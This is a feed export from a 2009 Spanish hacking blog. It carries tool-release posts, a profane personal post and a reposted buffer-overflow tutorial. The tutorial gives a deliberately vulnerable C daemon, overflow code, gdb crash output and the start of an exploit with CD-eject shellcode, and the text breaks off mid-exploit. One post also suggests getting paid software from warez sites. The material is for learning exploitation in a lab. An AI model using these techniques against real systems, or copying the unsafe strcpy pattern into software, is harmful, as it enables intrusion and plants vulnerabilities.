<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>H4x0r Security Blog</title><link>http://h4xxor.blogspot.com/</link><description>Blog Enfocado A la Seguridad Informatica El Hacking y Exploits.Hacking,Exploits,Seguridad Web,Bugs,Virus,Descargas de Programas de Hacking,Defacing,Noticias Open source,Videos ,Manuales en fin un mundo diferente</description><language>en</language><managingEditor>noreply@blogger.com (r3b1rth X)</managingEditor><lastBuildDate>Thu, 09 Jul 2009 11:13:11 PDT</lastBuildDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">107</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/H4xxorSecurityBlog" type="application/rss+xml" /><item><title>BackTrack 4 Pre-Final Lanzada</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/gBECon2a8DA/backtrack-4-pre-final-lanzada.html</link><category>Herramientas</category><category>pentest</category><category>Proyectos</category><category>Backtrack</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Fri, 19 Jun 2009 23:55:27 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-6805739490165998304</guid><description>Todavia no es la version final ni nada por el estilo pero si hay un poco de avanze en el lanzamiento de la final.&lt;br /&gt;&lt;br /&gt;El Gran Equipo de Remote Exploit a Anunciado El Lanzamiento de la Pre-Final De Este Maravilloso Sistema Operativo (Suite De Pentesting) ...Descrita como la mejor herramienta It en el mercAdo asi como lo mejor que puede tener un auditor de sistemas en sus manos sin nesesidad de agregar, o descargar aditivo si ya por si viene todo instalado.&lt;br /&gt;&lt;br /&gt;Ya como anuncian los desarrolladores y como se hizo con la beta por favor reportes de bugs y comportamiento raro reportenlo ya que de esa manera se le da la mano a los desarrolladores a hacer los arreglos correspondientes para la version final.&lt;br /&gt;&lt;br /&gt;para una lista de los cambios pueden descargar el PdF Aqui con un resumen de los arreglos y cambios de esta version &lt;a href="http://www.offensive-security.com/backtrack4-guide-tutorial.pdf"&gt;Aqui&lt;/a&gt; .&lt;br /&gt;&lt;br /&gt;Y para descargar la live cd pueden hacerlo desde &lt;a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso"&gt;Aqui&lt;/a&gt;, que es una Imagen .Iso DvD.&lt;br /&gt;&lt;br /&gt;Los Sums De la Iso Pueden Encontrarlos Aqui &lt;a href="http://spl0it.org/files/bt4-pre-final.txt"&gt;Md5sum y sha256sum&lt;/a&gt; .&lt;br /&gt;&lt;br /&gt;Por este medio Agradecer al Equipo De Remote-Exploit:&lt;br /&gt;&lt;a href="http://remote-exploit.blogspot.com/"&gt;Max Moser&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.offensive-security.com/"&gt;Mati Aharoni&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.remote-exploit.org/"&gt;Filip Waeytens&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.spl0it.org/"&gt;Joshua D. Abraham&lt;/a&gt;&lt;br /&gt;y no puede faltar a un gran amigo&lt;br /&gt;&lt;a href="http://pur3h4t3.blogspot.com/"&gt;J. Martin Bos &lt;/a&gt;(&lt;a href="http://forums.remote-exploit.org/"&gt;pureh@te&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;=====================================&lt;br /&gt;gracias mi gente y esperemos a que salga la final mientras tanto prueben con esa...&lt;br /&gt;&lt;br /&gt;salu2&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-6805739490165998304?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/gBECon2a8DA" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-06-19T23:55:27.070-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total><enclosure url="http://www.offensive-security.com/backtrack4-guide-tutorial.pdf" length="115386" type="application/pdf" /><feedburner:origLink>http://h4xxor.blogspot.com/2009/06/backtrack-4-pre-final-lanzada.html</feedburner:origLink></item><item><title>Acunetix 6.5 Lanzado Scanner De Vulnerabilidades</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/fFXCmSsY2_Y/acunetix-65-lanzado-scanner-de.html</link><category>Herramientas</category><category>Auditorias</category><category>SQL Inyection</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Fri, 19 Jun 2009 11:00:33 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-6894330739566130537</guid><description>Ya saben que siempre tengo una guerra en contra de los scanners automatizados y mas aun en la plataforma de la mierda de Sistema Operativo Windows...pero cumplo al menos con dar la noticia.&lt;br /&gt;&lt;br /&gt;y el Acunteix 6.5 fue lanzado supuestamente fueron arreglado y corregidos algunos bugs que tenia y se le hicieron una que otra mejora.&lt;br /&gt;&lt;br /&gt;yo personalmente no lo e probado ni nada asi que realmente no puedo indicarles como es su performance en los servidores&lt;br /&gt;&lt;br /&gt;tiene algunas cosas nuevas como recargar las paginas ey darle replay estilo live http headers o algo similar xD.&lt;br /&gt;&lt;br /&gt;se le agregaron strings de sql injection para que todos los script kiddies que hay en la red se puedan divertir aun mas xD..asi como mas soporte para tomcat y otras aplicaciones webs realmente la interfaz no cambio practicamente es la misma que la pasada.&lt;br /&gt;&lt;br /&gt;en fin mas herramientas para erradicar el elitismo de la la red o como dirian muchos enviandome mas mensajes&lt;br /&gt;&lt;br /&gt;"es para hacer el trabajo mas facil,o para un auditor es una herramienta indispensable,los responsables de las auditorias IT saben que es lo mejor"&lt;br /&gt;&lt;br /&gt;bla bla en fin pruebenla a ver lo mas lindo es el precio de la herramienta &lt;a href="http://www.acunetix.com/ordering/pricing.htm"&gt;Aqui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;pero nada que no se pueda conseguir por ahi como en warez bb o algo asi&lt;br /&gt;salu2&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-6894330739566130537?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/fFXCmSsY2_Y" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-06-19T11:00:33.558-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2009/06/acunetix-65-lanzado-scanner-de.html</feedburner:origLink></item><item><title>Ak De Nuevo</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/SlSP0mmk1Rk/ak-de-nuevo.html</link><category>Mi Vida</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Fri, 24 Apr 2009 12:14:42 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-8883989357215429303</guid><description>Bueno me estare dando la vuelta por aqui nuevamente ya que e estado muy ocupado recientemente con mi trabajo y mis funciones Mil.&lt;br /&gt;&lt;br /&gt;gracias a los que se han preocupado por mi y han hechado sus bendiciones les agradezco de puro corazon.&lt;br /&gt;&lt;br /&gt;a los "Haters" u Odiosos (que me odian) pues me pueden chupar mi gran verga,y conseguir una visa para que tengan 6 meses de ella xDDDDDDD lol sigan haciendo lo suyo que hago lo mio jajaja asi que ni se molesten y gasten energias en odiarme,me encantaria 2 minutos con cada uno de ellos que garantizadamente los OWNEO Facil.&lt;br /&gt;&lt;br /&gt;y pues estare por aqui dandome la vueltita seguidamente les quiere...&lt;br /&gt;&lt;br /&gt;blood_rec&lt;br /&gt;&lt;br /&gt;" U Can Hate Me Now "&lt;br /&gt;xDDDD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-8883989357215429303?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/SlSP0mmk1Rk" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-04-24T12:14:42.554-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2009/04/ak-de-nuevo.html</feedburner:origLink></item><item><title>Remote Exploitation with C and Perl by Preddy [English]</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/0e072uB2F4o/remote-exploitation-with-c-and-perl-by.html</link><category>exploits</category><category>manuales</category><category>papers</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Thu, 19 Mar 2009 21:21:18 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-6125399508130148493</guid><description>&lt;blockquote&gt;#RootShell Security Group#&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;&lt;br /&gt;-- Remote Exploitation with C and Perl by Preddy - RootShell Security Group&lt;br /&gt;&lt;br /&gt;--[ Contents&lt;br /&gt;&lt;br /&gt;1.1 - Goal&lt;br /&gt;1.2 - Situation&lt;br /&gt;1.3 - Vulnerable Daemon + Vulnerability analyses&lt;br /&gt;1.4 - Payload/Code construction/analyses in C&lt;br /&gt;1.5 - Payload/Code construction/analyses in Perl&lt;br /&gt;1.6 - Conlusion&lt;br /&gt;1.7 - Contact &amp; Feedback&lt;br /&gt;&lt;br /&gt;[1.1]--[ Goal&lt;br /&gt;&lt;br /&gt;Hi, Preddy here , 17 year old turkish kid from holland,First of all sorry for my english , please do notify me of any spelling errors.&lt;br /&gt;I would recommend you to read my previous tutorial about "Simple Buffer Overflows"&lt;br /&gt;to avoid misunderstanding in this tutorial and to get a basic understanding of buffer overflows.&lt;br /&gt;Our goal is to write two remote exploits , one in c and one in perl.&lt;br /&gt;Both of the exploits, exploit a vulnerability in a small vulnerable daemon.&lt;br /&gt;You would need perl installed(eg: ActivePerl for windows) and a compiler for c &lt;br /&gt;(eg: cygwin for windows) you should have perl and a compiler package installed at your&lt;br /&gt;linux distribution, you can install them with the following commands &lt;br /&gt;(incase you haven't got it installed) :&lt;br /&gt;&lt;br /&gt;To search for the perl package:&lt;br /&gt;&lt;br /&gt;apt-cache search perl&lt;br /&gt;&lt;br /&gt;then to install it:&lt;br /&gt;&lt;br /&gt;apt-get install [perl-pkg-name]&lt;br /&gt;&lt;br /&gt;you can do the same with the compiler package.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[1.2]--[ Situation&lt;br /&gt;&lt;br /&gt;I have a laptop on my left side and a desktop on my right-hand side.&lt;br /&gt;the laptop uses the following local ip address: 192.168.1.100&lt;br /&gt;and the desktop uses: 192.168.1.101 as it's local ip address.&lt;br /&gt;The laptop is the attacker in this situation and the desktop is our victim.&lt;br /&gt;both run slackware 10.2 and have the VA patch turned off.&lt;br /&gt;&lt;br /&gt;Turning the VA patch off:&lt;br /&gt;&lt;br /&gt;cat /proc/sys/kernel/randomize_va_space&lt;br /&gt;1&lt;br /&gt;echo 0 &gt; /proc/sys/kernel/randomize_va_space&lt;br /&gt;cat /proc/sys/kernel/randomize_va_space&lt;br /&gt;0&lt;br /&gt;&lt;br /&gt;The desktop computer runs a vulnerable daemon on port 7500 which we have to exploit&lt;br /&gt;and open its cd-rom drive with the payload. Once again it's a very basic stack overflow&lt;br /&gt;and this should be a piece of cake for the average exploit writer but it's very&lt;br /&gt;usefull for people who are just starting to write exploits and exploit buffer overflows.&lt;br /&gt;&lt;br /&gt;[1.3]--[ Vulnerable Daemon + Vulnerability analyses&lt;br /&gt;&lt;br /&gt;Our vulnerable daemon:&lt;br /&gt;&lt;br /&gt;server.c&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;errno.h&gt;&lt;br /&gt;#include &lt;sys/types.h&gt;&lt;br /&gt;#include &lt;sys/socket.h&gt;&lt;br /&gt;#include &lt;netinet/in.h&gt;&lt;br /&gt;&lt;br /&gt;#define LISTENPORT 7500&lt;br /&gt;&lt;br /&gt;#define BACKLOG 10&lt;br /&gt;&lt;br /&gt;#define MSG "Hello, how are you?"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;int handle_reply(char *str)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;char response[256];&lt;br /&gt;&lt;br /&gt;strcpy(response,str);&lt;br /&gt;&lt;br /&gt;printf("The client says \"%s\"\n",response);&lt;br /&gt;&lt;br /&gt;return 0;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int main(int argc, char * argv[]) {&lt;br /&gt;  int sock, conn;&lt;br /&gt;  struct sockaddr_in my_addr, client_addr;&lt;br /&gt;  int sockopt_on = 1;&lt;br /&gt;  int sa_in_size = sizeof(struct sockaddr_in);&lt;br /&gt;  char reply[1024];&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  //get a socket&lt;br /&gt;  if ((sock = socket(AF_INET, SOCK_STREAM,0)) == -1) {&lt;br /&gt;    perror("socket");&lt;br /&gt;    exit(1);&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  //first zero the struct&lt;br /&gt;  memset((char *) &amp;my_addr, 0, sa_in_size);&lt;br /&gt;&lt;br /&gt;  //now fill in the fields we need&lt;br /&gt;  my_addr.sin_family = AF_INET;&lt;br /&gt;  my_addr.sin_port = htons(LISTENPORT);&lt;br /&gt;  my_addr.sin_addr.s_addr = htonl(INADDR_ANY);&lt;br /&gt;&lt;br /&gt;  //bind our socket to the port&lt;br /&gt;  if (bind(sock,(struct sockaddr *)&amp;my_addr, sa_in_size) == -1) {&lt;br /&gt;    perror("bind");&lt;br /&gt;    exit(1);&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  //start listening for incoming connections&lt;br /&gt;  if (listen(sock,BACKLOG) == -1) {&lt;br /&gt;    perror("listen");&lt;br /&gt;    exit(1);&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  while(1) {&lt;br /&gt;    //grab connections&lt;br /&gt;    conn = accept(sock, (struct sockaddr *)&amp;client_addr, &amp;sa_in_size);&lt;br /&gt;    if (conn == -1) {&lt;br /&gt;      perror("accept");&lt;br /&gt;      exit(1);&lt;br /&gt;    }&lt;br /&gt;&lt;br /&gt;    //log the connecter&lt;br /&gt;    printf("got connection from %s\n", inet_ntoa(client_addr.sin_addr));&lt;br /&gt;&lt;br /&gt;    //send a greeting&lt;br /&gt;    send(conn,MSG,strlen(MSG)+1,0);&lt;br /&gt;&lt;br /&gt;    //get the reply&lt;br /&gt;    recv(conn, reply, 1024, 0);&lt;br /&gt;&lt;br /&gt;    handle_reply(reply);&lt;br /&gt;&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  return 0;&lt;br /&gt;}&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;This piece of code serves as a daemon and waits for people to connect,&lt;br /&gt;on a successfull connection the server replies with a message and&lt;br /&gt;waits for the user to reply back with his message.&lt;br /&gt;The message get's stored in a buffer called 'reply' which can hold&lt;br /&gt;1024 bytes of data.&lt;br /&gt;&lt;br /&gt;the vulnerability lies in the handle_reply() function let's analyze it:&lt;br /&gt;&lt;br /&gt;handle_reply()&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;int handle_reply(char *str)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;char response[256];&lt;br /&gt;&lt;br /&gt;strcpy(response,str);&lt;br /&gt;&lt;br /&gt;printf("The client says \"%s\"\n",response);&lt;br /&gt;&lt;br /&gt;return 0;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;as you can see it has a response buffer which can hold 256 bytes of data&lt;br /&gt;the reply message from the user gets copied in that buffer and the response&lt;br /&gt;message is viewed at the server.&lt;br /&gt;&lt;br /&gt;like this,&lt;br /&gt;&lt;br /&gt;client:&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;telnet 192.168.1.101 7500&lt;br /&gt;Trying 192.168.1.101...&lt;br /&gt;Connected to 192.168.1.101.&lt;br /&gt;Escape character is '^]'.&lt;br /&gt;Hello, how are you?fine thanks how are you?&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;server:&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;got connection from 192.168.1.100&lt;br /&gt;The client says "fine thanks how are you?&lt;br /&gt;"&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;as you can see nothing special happens. But let's try to send a buffer which&lt;br /&gt;is 272 bytes , which exceeds the buffersize of the response buffer in the handle_reply()&lt;br /&gt;function.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[1.4]--[ Payload/Code construction/analyses in C&lt;br /&gt;&lt;br /&gt;We want to send a 272 byte buffer to port 7500 of our victim (192.168.1.101)&lt;br /&gt;so let's start by writing a simple piece of c code which can send 272 x A (0x41) to port&lt;br /&gt;7500. Also don't forget to enable coredumps to analyze the overflow,&lt;br /&gt;&lt;br /&gt;Enabling coredumps:&lt;br /&gt;&lt;br /&gt;ulimit -c unlimited&lt;br /&gt;&lt;br /&gt;Our overflow code:&lt;br /&gt;&lt;br /&gt;send_overflow.c&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;&lt;br /&gt;-- Send overflow (C version) written by Preddy&lt;br /&gt;&lt;br /&gt;   Part of Preddy's Remote Exploitation with C and Perl tutorial&lt;br /&gt;&lt;br /&gt;   Usage: ./send_overflow &lt;ip&gt;&lt;br /&gt;&lt;br /&gt;   Example: ./send_overflow 192.168.1.101&lt;br /&gt;&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;include headers which are required for a network connection &lt;br /&gt;and other functionalities in the program &lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;sys/socket.h&gt;&lt;br /&gt;#include &lt;sys/types.h&gt;&lt;br /&gt;#include &lt;netinet/in.h&gt;&lt;br /&gt;#include &lt;netdb.h&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;define our remote port and the data which we are going to send&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#define REMPORT      7500&lt;br /&gt;#define A            0x41&lt;br /&gt;&lt;br /&gt;//Start with the program&lt;br /&gt;int main(int argc,char **argv)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;/* declare our variables */&lt;br /&gt;int conn; //our connection variable, which will connect to the remote computer&lt;br /&gt;int fd; // our socket file descriptor&lt;br /&gt;&lt;br /&gt;//assign struct sockadd_in to remaddr&lt;br /&gt;struct sockaddr_in remaddr;&lt;br /&gt;&lt;br /&gt;//declare our payload buffer which will hold 272 bytes of data&lt;br /&gt;char payload[272];&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;check if the first commandline argument is given (the ip address)&lt;br /&gt;if NOT print a message and exit&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;if(!argv[1])&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;printf("Specify ip plz..\n");&lt;br /&gt;&lt;br /&gt;exit(1);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;create the socket and also check for errors at creation&lt;br /&gt;if an error is detected socket() will return -1&lt;br /&gt;*/&lt;br /&gt;if((fd = socket(AF_INET,SOCK_STREAM,0)) == -1)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;perror("socket");&lt;br /&gt;&lt;br /&gt;exit(1);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;this is going to overwrite the Extended Instruction Pointer&lt;br /&gt;with 4 x 0x42  (BBBB -&gt; 0x42 is also knows as B in its ascii form - http://www.lookuptables.com/)&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;char *eip = "\x42\x42\x42\x42";&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;fill our payload with 268 bytes of A (previously defined as 0x41)&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;memset(payload,A,268);&lt;br /&gt;&lt;br /&gt;/* fill the part after 268 bytes with our eip (BBBB - 0x42424242) */&lt;br /&gt;&lt;br /&gt;memcpy(payload+268,eip,sizeof(eip));&lt;br /&gt;&lt;br /&gt;/* connection information */&lt;br /&gt;remaddr.sin_family = AF_INET; //domain&lt;br /&gt;remaddr.sin_addr.s_addr = inet_addr(argv[1]); //remote connection address (our first argument - IP)&lt;br /&gt;remaddr.sin_port = htons(REMPORT); //the remote port to connect to (previously defined as 7500)&lt;br /&gt;&lt;br /&gt;/* this is where the actual connection take's place */&lt;br /&gt;&lt;br /&gt;conn = connect(fd, (struct sockaddr_in *)&amp;remaddr,sizeof(remaddr)); &lt;br /&gt;&lt;br /&gt;/* check the connection for errors as you know it returns -1 at errors */&lt;br /&gt;if(conn &lt; 0)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;printf("Error: could not connect\n");&lt;br /&gt;exit(1);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/* this is the part where our payload gets sent */&lt;br /&gt;&lt;br /&gt;send(fd,payload,strlen(payload),0);&lt;br /&gt;&lt;br /&gt;/* this is extra information which is displayed after sending the payload */&lt;br /&gt;&lt;br /&gt;printf("Payload Size: %i\n",sizeof(payload));&lt;br /&gt;printf("Payload Sent..\n");&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Now we can start with compiling our program:&lt;br /&gt;&lt;br /&gt;client:&lt;br /&gt;---&lt;br /&gt;gcc send_overflow.c -o send_overflow&lt;br /&gt;&lt;br /&gt;./send_overflow 192.168.1.101&lt;br /&gt;Payload Size: 272&lt;br /&gt;Payload Sent..&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;server:&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;got connection from 192.168.1.100&lt;br /&gt;The client says "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"&lt;br /&gt;Segmentation fault (core dumped)&lt;br /&gt;bash-3.00# gdb -c core ./server&lt;br /&gt;GNU gdb 6.3&lt;br /&gt;Copyright 2004 Free Software Foundation, Inc.&lt;br /&gt;GDB is free software, covered by the GNU General Public License, and you are&lt;br /&gt;welcome to change it and/or distribute copies of it under certain conditions.&lt;br /&gt;Type "show copying" to see the conditions.&lt;br /&gt;There is absolutely no warranty for GDB.  Type "show warranty" for details.&lt;br /&gt;This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".&lt;br /&gt;&lt;br /&gt;Core was generated by `./server'.&lt;br /&gt;Program terminated with signal 11, Segmentation fault.&lt;br /&gt;&lt;br /&gt;warning: current_sos: Can't read pathname for load map: Input/output error&lt;br /&gt;&lt;br /&gt;Reading symbols from /lib/tls/libc.so.6...done.&lt;br /&gt;Loaded symbols for /lib/tls/libc.so.6&lt;br /&gt;Reading symbols from /lib/ld-linux.so.2...done.&lt;br /&gt;Loaded symbols for /lib/ld-linux.so.2&lt;br /&gt;#0  0x42424242 in ?? ()&lt;br /&gt;(gdb) i r eip&lt;br /&gt;eip            0x42424242       0x42424242&lt;br /&gt;(gdb) &lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;as you see we have overwritten the extended intruction pointer with our own&lt;br /&gt;eip which we constructed before in our payload (char *eip = "\x42\x42\x42\x42";)&lt;br /&gt;and its overwritten with exacly BBBB&lt;br /&gt;&lt;br /&gt;so now we have to place our shellcode in our payload and also our nopsled.&lt;br /&gt;and finish a huge part of the exploit.&lt;br /&gt;&lt;br /&gt;server_exploit.c&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;&lt;br /&gt;-- Remote "eject cd-rom" exploit (C version) written by Preddy&lt;br /&gt;&lt;br /&gt;   Part of Preddy's Remote Exploitation with C and Perl tutorial&lt;br /&gt;&lt;br /&gt;   Usage: ./server_exploit &lt;ip&gt;&lt;br /&gt;&lt;br /&gt;   Example: ./server_exploit 192.168.1.101&lt;br /&gt;&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;include headers which are required for a network connection &lt;br /&gt;and other functionalities in the program &lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;sys/socket.h&gt;&lt;br /&gt;#include &lt;sys/types.h&gt;&lt;br /&gt;#include &lt;netinet/in.h&gt;&lt;br /&gt;#include &lt;netdb.h&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;define our remote port and the data which we are going to send&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#define REMPORT      7500&lt;br /&gt;#define NOP          0x90&lt;br /&gt;#define A            0x41&lt;br /&gt;&lt;br /&gt;//Start with the program&lt;br /&gt;&lt;br /&gt;int main(int argc,char **argv)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;//Our shellcode which ejects the cd-rom drive..&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes&lt;br /&gt; * - izik &lt;izik @tty64.org&gt;&lt;br /&gt; */&lt;br /&gt;&lt;br /&gt;char scode[] = &lt;br /&gt;&lt;br /&gt; "\x6a\x05"              // push $0x5 &lt;br /&gt; "\x58"                  // pop %eax &lt;br /&gt; "\x31\xc9"              // xor %ecx,%ecx &lt;br /&gt; "\x51"                  // push %ecx &lt;br /&gt; "\xb5\x08"              // mov $0x8,%ch &lt;br /&gt; "\x68\x64\x72\x6f\x6d"  // push $0x6d6f7264 &lt;br /&gt; "\x68\x65\x76\x2f\x63"  // push $0x632f7665 &lt;br /&gt; "\x68\x2f\x2f\x2f\x64"  // push $0x642f2f2f &lt;br /&gt; "\x89\xe3"              // mov %esp,%ebx &lt;br /&gt; "\xcd\x80"              // int $0x80 &lt;br /&gt; "\x89\xc3"              // mov %eax,%ebx &lt;br /&gt; "\xb0\x36"              // mov $0x36,%al &lt;br /&gt; "\x66\xb9\x09\x53"      // mov $0x5309,%cx&lt;br /&gt; "\xcd\x80"              // int $0x80 &lt;br /&gt; "\x40"                  // inc %eax &lt;br /&gt; "\xcd\x80";             // int $0x80 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/* declare our variables */&lt;br /&gt;int conn; //our connection variable, which will connect to the remote computer&lt;br /&gt;int fd; // our socket file descriptor&lt;br /&gt;&lt;br /&gt;//assign struct sockadd_in to remaddr&lt;br /&gt;struct sockaddr_in remaddr;&lt;br /&gt;&lt;br /&gt;//declare our payload buffer which will hold 272 bytes of data&lt;br /&gt;char payload[272];&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;check if the first commandline argument is given (the ip address)&lt;br /&gt;if NOT print a message and exit&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;if(!argv[1])&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;printf("Specify ip plz..\n");&lt;br /&gt;&lt;br /&gt;exit(1);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;create the socket and also check for errors at creation&lt;br /&gt;if an error is detected socket() will return -1&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;if((fd = socket(AF_INET,SOCK_STREAM,0)) == -1)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;perror("socket");&lt;br /&gt;&lt;br /&gt;exit(1);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;this is going to overwrite the Extended Instruction Pointer&lt;br /&gt;with 4 x 0x42  (BBBB -&gt; 0x42 is also knows as B in its ascii form - http://www.lookuptables.com/)&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;char *eip = "\x42\x42\x42\x42";&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;&lt;br /&gt;Shellcode size: 40 bytes&lt;br /&gt;&lt;br /&gt;272 bytes used to overwrite eip with 0x42424242&lt;br /&gt;&lt;br /&gt;eip = 4 bytes&lt;br /&gt;&lt;br /&gt;272 -4 = 268&lt;br /&gt;268 - 40 = 228&lt;br /&gt;Nopsled = 228 bytes&lt;br /&gt;&lt;br /&gt;*/&lt;br /&gt;&lt;br 